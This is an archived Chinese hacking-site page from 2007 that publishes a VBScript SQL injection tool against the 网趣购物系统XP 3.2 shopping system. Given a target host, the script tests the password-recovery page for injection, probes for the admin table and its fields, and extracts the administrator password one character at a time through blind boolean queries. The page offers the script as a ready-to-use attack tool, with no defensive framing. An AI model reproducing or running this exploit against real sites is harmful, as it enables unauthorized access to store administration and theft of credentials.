网趣购物系统XP 3.2注入漏洞--网趣购物系统,XP,注入,漏洞

[组图]网趣购物系统XP 3.2注入漏洞

热荐 ★★★★★

网趣购物系统XP 3.2注入漏洞

文章整理发布：黑客风云文章来源：www.05112.com 更新时间：2007-11-6

'Code by Tr4c3@126.com
On Error Resume Next
Dim strUrl,strRight
Set objArgs = WScript.Arguments
If objArgs.Count<>1 Then
WScript.Echo "网趣购物系统XP V3.2版注入工具 By Tr4c3[at]126[dot]CoM"
WScript.Echo "用于默认配置的猜解，默认管理员admin,adminid=1"
WScript.Echo "Usage:Cscript getpass.vbs www.tr4c3.com"
WScript.Quit
Else
strUrl = "http://"&objArgs(0)&"/getpwd2.asp"
strFalse="注册" '特征字符
End If

'检查是否存在注入
If xPosts("username='+or+1=1+and+''='")=True And xPosts("username='+or+1=2+and+''='")=False Then
WScript.Echo "存在注入..."
Else
WScript.Echo "不存在注入..."
WScript.Quit
End if

'检查表
If xPosts("username='+or+0<>(select+count(*)+from+wq_admin)+and+''='")=True Then
WScript.Echo "存在wq_admin表..."
Else
WScript.Echo "不存在wq_admin表，退出！请手工校验。"
WScript.Quit
End if

'检查字段
If xPosts("username='+or+0<>(select+count(admin)+from+wq_admin)+and+''='")=True Then
WScript.Echo "存在字段admin..."
Else
WScript.Echo "不存在字段admin，退出！请手工校验。"
WScript.Quit
End If
If xPosts("username='+or+0<>(select+count(password)+from+wq_admin)+and+''='")=True Then
WScript.Echo "存在字段password,开始猜解密码..."
Else
WScript.Echo "不存在字段password，退出！请手工校验。"
WScript.Quit
End if

'猜测密码
pass = ""
strings = "0123456789abcdefghijklmnopqrstuvwxyz"
For j = 1 To 16 Step 1
For k = 1 to len(strings) step 1
If xPosts("username='+or+(select+left(password,"&j&")+from+wq_admin+where+adminid=1)='"&pass&mid(strings,k,1)&"'+and+''='")=True Then
pass = pass & mid(strings,k,1)
exit For
End If
Next
Next

If error Then
WScript.Echo "error:" & Error.Description
Error.Clear
Else
WScript.Echo "Password=" & pass
Wscript.Quit
End If

'---------------------------------------------------------------------------------------
'Code by NP
Function bytes2BSTR(vIn)
strReturn = ""
For i = 1 To LenB(vIn)
ThisCharCode = AscB(MidB(vIn,i,1))
If ThisCharCode < &H80 Then
strReturn = strReturn & Chr(ThisCharCode)
Else
NextCharCode = AscB(MidB(vIn,i+1,1))
strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))
i = i + 1
End If
Next
bytes2BSTR = strReturn
End Function
'-----------------------------------------------------------------------------------------
Function xPosts(strSql)
Set xPost = CreateObject("Microsoft.XMLHTTP")
xPost.open "POST",strUrl,False
xPost.setRequestHeader "Content-Type","Application/x-www-form-urlencoded"
xPost.send strSql
data=bytes2BSTR(xPost.responseBody)
If InStr(data,strFalse)=0 Then
xPosts=True
Else
xPosts=False
End if
End function

上一页 [1] [2]

文章录入：cainiaowang 责任编辑：cainiaowang

上一篇文章：动易网站管理系统vote.asp页面存在SQL注入漏洞

下一篇文章：没有了

【字体：小大】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】

VIP 专区

	抽根憋闷烟的心声
	学习网页制作的理由
	加入终身会员的理由!!!
	学习黑客编程的5大理由
	学习免杀的6大理由
	学习软件破解的理由
	常见问题解答
	汇款向导
	学员报名咨询

最新热门

	网趣购物系统XP 3.2注入漏洞	11-06
	动易网站管理系统vote.asp页面存	11-01
	终点文学的0DAY	10-26
	风讯4高危漏洞	10-19
	不为人知的动网7.1 SQL版注入漏洞	10-19
	跨站跨到了主页里,解析云网论坛最	10-09
	动网8.0最新XSS漏洞	10-09
	检测周杰伦官方网站	10-05
	入侵远古VOD 0day	10-05
	Discuz!6.0.0注入漏洞	09-27
	动网8.0最新远程注入漏洞来了	09-22
	利用最近热门的Xss漏洞能做什么?	09-10

动易网站管理系统vote.asp页面存在SQL注

风讯、科讯漏洞利用

七招打造安全的Windows XP操作系统

ARP病毒利用联众、超星阅读器0Day漏洞大

用U盘轻松去除XP管理员密码

打造抵御SQL注入攻击的MS SQL服务器

Ghost XP系统含漏洞藏杀机伺机破坏计算

跨站跨到了主页里,解析云网论坛最新漏洞